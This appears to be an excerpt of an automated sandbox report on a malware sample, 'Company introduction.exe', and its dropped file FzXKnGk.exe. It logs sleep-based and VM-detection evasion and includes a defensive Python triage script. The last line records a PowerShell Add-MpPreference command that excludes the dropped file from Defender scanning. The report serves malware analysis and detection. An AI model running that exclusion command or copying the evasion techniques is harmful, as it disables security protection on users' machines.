                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596562
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596164
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596060
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595940
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595729
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595515
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595297
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594968
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594640
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594530
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594422
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7726
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1957
                Source: C:\Users\user\Desktop\Company introduction.exe | Window / User API: threadDelayed 2278
                Source: C:\Users\user\Desktop\Company introduction.exe | Window / User API: threadDelayed 7571
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Window / User API: threadDelayed 2141
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Window / User API: threadDelayed 7694
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 7472 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 | Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -26747778906878833s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599891s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8136 | Thread sleep count: 2278 > 30
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8136 | Thread sleep count: 7571 > 30
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599766s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599641s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599531s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599421s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599306s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599202s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -599084s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598953s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598844s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598734s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598625s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598516s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598406s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598281s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598172s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -598049s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597922s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597812s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597703s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597594s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597484s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597366s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597250s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597140s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -597030s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596922s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596812s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596703s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596594s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596484s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596375s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596266s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596141s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -596016s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595906s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595797s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595687s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595578s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595468s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595358s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595250s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595141s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -595016s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -594891s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -594781s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -594672s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -594562s >= -30000s
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108 | Thread sleep time: -594453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7912 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep count: 36 > 30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -33204139332677172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7180 | Thread sleep count: 2141 > 30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599871s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7180 | Thread sleep count: 7694 > 30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599648s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599545s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -599109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598999s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -598109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597999s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597884s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597671s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597552s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -597000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596164s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -596060s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595940s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595729s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -595078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -594968s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -594859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -594750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -594640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -594530s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184 | Thread sleep time: -594422s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599891
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599766
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599641
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599531
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599421
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599306
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599202
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 599084
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598953
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598844
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598734
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598625
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598516
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598406
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598281
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598172
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 598049
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597922
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597812
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597703
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597594
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597484
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597366
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597250
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597140
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 597030
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596922
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596812
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596703
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596594
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596484
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596375
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596266
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596141
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 596016
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595906
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595797
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595687
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595578
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595468
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595358
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595250
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595141
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 595016
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 594891
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 594781
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 594672
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 594562
                Source: C:\Users\user\Desktop\Company introduction.exe | Thread delayed: delay time: 594453
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599871
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599765
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599648
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 599109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 598109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597884
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597671
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597552
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 597000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596562
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596164
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 596060
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595940
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595729
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595515
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595297
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 594968
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 594640
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 594530
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 594422
                Source: FzXKnGk.exe, 0000000C.00000002.2938862935.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                Source: Company introduction.exe, 00000006.00000002.2939061620.00000000013C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                Source: FzXKnGk.exe, 00000007.00000002.1754239907.00000000007C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A89548 LdrInitializeThunk,LdrInitializeThunk,6_2_05A89548
                Source: C:\Users\user\Desktop\Company introduction.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: page read and write | page guardJump to behavior
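A triage helper for the sandbox-evasion observations above, as an added example that is not part of the Joe Sandbox report or of the sample. It pulls the requested sleep lengths and the memory strings out of report lines (the lines embedded below are constructed copies of the ones above), flags a long sleep (the values are treated as milliseconds and the 3-minute threshold is an assumption), recognises the countdown shape of the delays, which is consistent with a loop that re-sleeps the time remaining to a deadline after the sandbox shortens each individual sleep, and weights VM-artifact strings. The "Hyper-V RAW" string is the name of a Winsock provider that mswsock.dll carries on any Windows 10 host, so it is scored as weak evidence next to the VMware CD-ROM device ID; the weights themselves are my choice, not the report's.

```python
import re

# Constructed copies of the "Thread delayed" and "Binary or memory string"
# observations in the report; the parser only needs the observation text,
# so the exact column layout of the extracted report does not matter.
REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595515",
    r"Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595406",
    r"Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595297",
    r"Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe | Thread delayed: delay time: 595187",
    r"Source: FzXKnGk.exe, 0000000C.00000002.2938862935.00000000015EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5",
    r"Source: FzXKnGk.exe, 00000007.00000002.1754239907.00000000007C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{",
]

DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
MEMSTR_RE = re.compile(r"Binary or memory string: (.*)$")
LONG_SLEEP_MS = 3 * 60 * 1000  # assumed threshold: 3 minutes, values read as ms

# (pattern, label, weight). A hypervisor device ID is strong evidence that the
# sample is fingerprinting the machine; the "Hyper-V RAW" Winsock provider name
# is present in mswsock.dll on every Windows 10 host and is weak on its own.
VM_ARTIFACTS = [
    (re.compile(r"Ven_(?:NECVMWar|VMware)|Prod_VMware", re.I), "vmware device id", 3),
    (re.compile(r"VBOX|VirtualBox", re.I), "virtualbox", 3),
    (re.compile(r"\bQEMU\b|\bXen\b", re.I), "qemu/xen", 2),
    (re.compile(r"Hyper-V RAW", re.I), "hyper-v winsock provider", 1),
]


def parse(lines):
    """Split report lines into requested delays (ints) and memory strings."""
    delays, strings = [], []
    for line in lines:
        m = DELAY_RE.search(line)
        if m:
            delays.append(int(m.group(1)))
            continue
        m = MEMSTR_RE.search(line)
        if m:
            strings.append(m.group(1))
    return delays, strings


def sleep_profile(delays):
    """Longest requested delay, whether it crosses the long-sleep threshold, and
    whether the sequence is a countdown: each request slightly shorter than the
    previous one, as a 'sleep until deadline' loop produces when the sandbox
    lets only a fraction of each requested sleep actually elapse."""
    if not delays:
        return {"max_ms": 0, "long_sleep": False, "countdown": False}
    steps = [a - b for a, b in zip(delays, delays[1:])]
    countdown = len(steps) >= 2 and all(0 < s < 1000 for s in steps)
    longest = max(delays)
    return {"max_ms": longest, "long_sleep": longest >= LONG_SLEEP_MS, "countdown": countdown}


def vm_artifacts(strings):
    """Return (label, weight) for every VM-artifact pattern seen in the strings."""
    found = []
    for s in strings:
        for rx, label, weight in VM_ARTIFACTS:
            if rx.search(s):
                found.append((label, weight))
    return found


def triage(lines):
    delays, strings = parse(lines)
    prof = sleep_profile(delays)
    arts = vm_artifacts(strings)
    score = sum(w for _, w in arts)
    score += 2 if prof["long_sleep"] else 0
    score += 1 if prof["countdown"] else 0
    return {"sleep": prof, "vm_artifacts": arts, "evasion_score": score}


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    print(f"longest sleep: {result['sleep']['max_ms']} ms, countdown={result['sleep']['countdown']}")
    for label, weight in result["vm_artifacts"]:
        print(f"  vm artifact: {label} (+{weight})")
    print(f"evasion score: {result['evasion_score']}")
```

The countdown check is the useful part: a single long sleep is trivially handled by a sandbox that skips sleeps, but a sample that recomputes the remaining time after every return notices that far less wall-clock time passed than it asked for, which is why the delays above shrink by roughly 110 ms per call instead of by the full request.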

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Company introduction.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
